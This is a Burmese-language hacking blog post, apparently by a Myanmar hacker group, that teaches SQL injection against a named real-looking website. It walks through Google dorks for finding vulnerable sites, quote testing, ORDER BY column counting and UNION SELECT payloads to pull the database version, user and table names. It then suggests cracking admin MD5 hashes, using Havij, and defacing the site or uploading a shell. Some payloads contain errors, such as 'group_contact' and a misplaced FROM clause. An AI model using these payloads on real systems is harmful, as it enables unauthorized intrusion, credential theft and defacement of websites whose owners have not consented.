က်ဴတိုရီရယ္ကို
ပထမဆံုးစေရးတာဆိုေတာ့ အမွားပါရင္ခြင့္လႊတ္ပါေနာ္။ SQL injection ဆိုတာ လြယ္ကူတဲ့
အမ်ိဳးေတာ့ မဟုတ္။
SQL injection
ကိုနားမလည္တဲ့လူေတြအမ်ားၾကီးရွိပါတယ္။ တကယ္ေတာ့ SQL injection ဆိုတာ Programmer
ရဲ့ URL VULN မွာ admin pass,user ေတြကို မသြားတာေပါ့ဗ်ာ။ ဒီ က်ဴတိုရီရယ္
ေလးကေတာ့ SQL injectionကို နားလည္လြယ္ ေအာင္ ေရးထားပါတယ္။
What is SQL Injection?
အေပၚမွာေျပာခဲ့သလိုေပါ့
SQL injection ဆိုတာ Programmer ရဲ့ URL VULN မွာ admin pass, user ေတြကို
မသြား တာ။ ဟုတ္တယ္. . .ဒါေပမယ့္အဲ့ေလာက္လြယ္ေနရင္ေတာ့ လူတိုင္း
ဟက္ကာျဖစ္ျပီေပါ့ ဟီးဟီး ^_^။ Attacker တစ္ေယာက္က sql vuln ျဖစ္တဲ့ ဆိုက္ကိုရွာ
DORK ေတြသံုးတာေပါ့။ ေတြ႕ရင္ လည္း colum ေတြ Tableေတြရွာရမယ္။ တစ္ခ်ိဳဳ ့
ဆိုက္ေတြမွာ admin table မရွိဘူး။ အာ့မ်ိဴးဆိုရင္ေတာ့ ဂြမ္းျပီေပါ့ဗ်ာ။ Admin
Access ရရင္ေတာ့ဗ်ာ DEFACE အုပ္မွာလား။ Shell တင္မလားၾကိဳက္ တာလုပ္ေတာ့။
Injection
အတြက္လိုအပ္တာေလးေတြကေတာ့
1. Sql injection Dork
List(Vulnျဖစ္တဲ ့ဆိုက္ေတြရွာဖို ့ေပါ့ )
2.Little Bit
Understanding about Database and URL
3. A Browser
1. Find Vuln Web
site....
Attacker တစ္ေယာက္က
ဆိုက္ကိုရွာဖို႔အတြက္ Google လို Search engine ေတြမွာ Dork List ထဲက
keyword ေတြနဲ႔ ရွာရမွာပါ။ Googleမွာ "inurl:index.php?id=" Dork
Listေတြက အမ်ားၾကီးေနာ္။ ဒါကနမူနာ အဲ့လိုရွာလိုက္ရင္ေတာ့ အားပါးပါး
ဆိုက္ေတြအမ်ားၾကီးကို ေတြ႕မွာပါ။ အဲ့ထဲက တစ္ဆိုက္ေလာက္ ေရြးလိုက္ပါ။ ျပီးရင္link
ကိုၾကည့္ ပါ။ http://www.kenwright.com/index.php?id=1265 ထားပါေတာ့။
အဲ့လိုေတြ႕ ပါလိမ့္မယ္ vuln ျဖစ္မျဖစ္ကေတာ့ . . . .
2.The Site is Vuln or
NOT???
ကဲခုနက လင့္ေလးေနာက္မွာ
(')ေလးထည့္လိုက္ပါ။ အာ့ဆိုလင့္ေလးက
http://www.kenwright.com/index.php?id=1265'ဆိုျပီးျဖစ္တာေပါ့ေနာ္။
အဲ့လိုလုပ္လို ့Browser မွာ -
ငိငိဒါဆိုေတာ့ကံေကာင္းျပီ
vuln ျဖစ္ေနျပီ အဲ ့လိုမဟုတ္ပဲ အျဖဴ ပဲေပၚရင္လည္း Vuln ပါ။
3. Find the number of
columns...
ကဲကဲကြ်န္ေတာ္တို ့column
ရွာရေတာ့မယ္ေလျပီးရင္ေတာ့ ....ဟီးဟီး ---ဘယ္လိုရွာမလဲဆိုေတာ့
http://www.kenwright.com/index.php?id=1265 အဲ့ဒါေလးရဲ့
ေနာက္မွာ Order by 1 ဆိုျပီးေတာ့ရွာပါ။ Error မတက္ ရင္ေတာ့ မေတြ ့ေသးလို ့ပါ။
အဲ့ဒီနည္းကမရရင္လဲ Order by 1-- ဆိုျပီးေတာ့ေပါ့။ မေတြ႕ရင္ေတာ့ မရွိေသးလို ့ပါ
Error မတက္ မခ်င္းေပါ့။
http://www.kenwright.com/index.php?id=1265 Order by
6--
http://www.kenwright.com/index.php?id=1265 Order by
7--
http://www.kenwright.com/index.php?id=1265 Order by
8--
http://www.kenwright.com/index.php?id=1265 Order by
9--
http://www.kenwright.com/index.php?id=1265 Order by
10--
http://www.kenwright.com/index.php?id=1265 Order by
11--
ကဲ Order by 11-- မွာ
Error ေတြ႕ရင္ေတာ့colum ဆယ္တစ္ခုရွိတယ္လို ့သိရပါမယ္။ ဒီလိုေပၚပါ လိမ့္မယ္။
1054: Unknown column '11'
in 'order clause'
SELECT * FROM
kenw_content WHERE id = 1265 order by 11--
ငိငိ
အဲ့လိုေလးေပါ့။ အာ့ဆိုရင္ေတာ့ number of column = 10 ပါ။
Error မတက္ခင္ order by 10-- ပံု |
Error တက္သြားခ်ိန္ order by 11-- ပံု |
3.Find the vuln column.
ကဲဘယ္လို ယူမလဲဆိုေတာ့
http://www.kenwright.com/index.php?id=-1265 UNION
SELECT 1,2,3,4,5,6,7,8,9,10--
အဲ့လိုေလးေပါ့။ ဒါေပမယ့္သတိထားဖို႔ ကေတာ့
id မွာ - ထည့္ဖို ့မေမ့ပါနဲ ့ေနာ္။ ^_^ အာ့ဆိုရင္ေတာ့ vuln
column ေတြေပၚလာပါလိမ့္မယ္။
4.Finding sql
version,Database and User.
နမူနာအေနနဲ
ေပါ့အခုေတာ့ခရီးေပါက္ေနပါျပီေနာ္ ဟုတ္တယ္ဟုတ္။Version ရွာရင္ေတာ့
http://www.kenwright.com/index.php?id=-1265 union
select 1,version(),3,4,5,6,7,8,9,10--
Database version
ရွာခ်င္ရင္ေတာ့
http://www.kenwright.com/index.php?id=-1265 union
select 1,version(),3,4,5,6,7,8,9,10--
ကဲကဲ User
က္ုိရွာမယ္ဆိုရင္ေတာ့
http://www.kenwright.com/index.php?id=-1265 union
select 1,user(),3,4,5,6,7,8,9,10--
အဲ့လိုေလးေပ့ါ။ ^_^ း)
5.Finding the Table
name.
Table ကလည္းအေရးၾကီးပါတယ္
သူ့ထဲမွာ Admin user,pass ေတြပါတယ္ေလ။ သူ ့နာမည္ေလး ေတြရွာတာေပါ့ဗ်ာ။
http://www.kenwright.com/index.php?id=-1265 union
select 1,group_contact(table_name), 3,4,5,6,7,8,9,10-- from
information_schema.tables where table_schema=database()
ကဲကဲ Enter
ေခါက္လိုက္ေတာ့ Tableၾကီးအျပည့္ေပၚလာျပီေပါ့။ အဲ့မွာ admin user,pass ရွာပါ MD5ေလး
ေတာ့ျဖည္ပါေနာ္။
admin page ကို
Havijသံုးျပီးလုပ္ပါ။ admin ျဖစ္ျပီဆိုေတာ့လုပ္ခ်င္တိုင္းလုပ္ေပါ့။
ကြ်န္ေတာ္ေနာက္ဆံုးေျပာခ်င္တာကေတာ့
ဟက္ကင္းဟာလြယ္မွာေတာ့မဟုတ္ဘူး ဆိုတာပါ။ :)
r3D !nj3ct0r (MHW)
Greetz
to :: z@_@y|Nay Paing|B00M|All MHW member|and all myanmar Hacker
2 comments:
လာလည္သြားပါတယ္ ခမ်ာ က်ေနာ့္ ဘေလာ့ ေလးလညး္အားေပးပါဦး
http://revoultionofmyanmarhacker.blogspot.com/
ေက်းဇူးတင္ပါတယ္ခင္မ်ာ
Post a Comment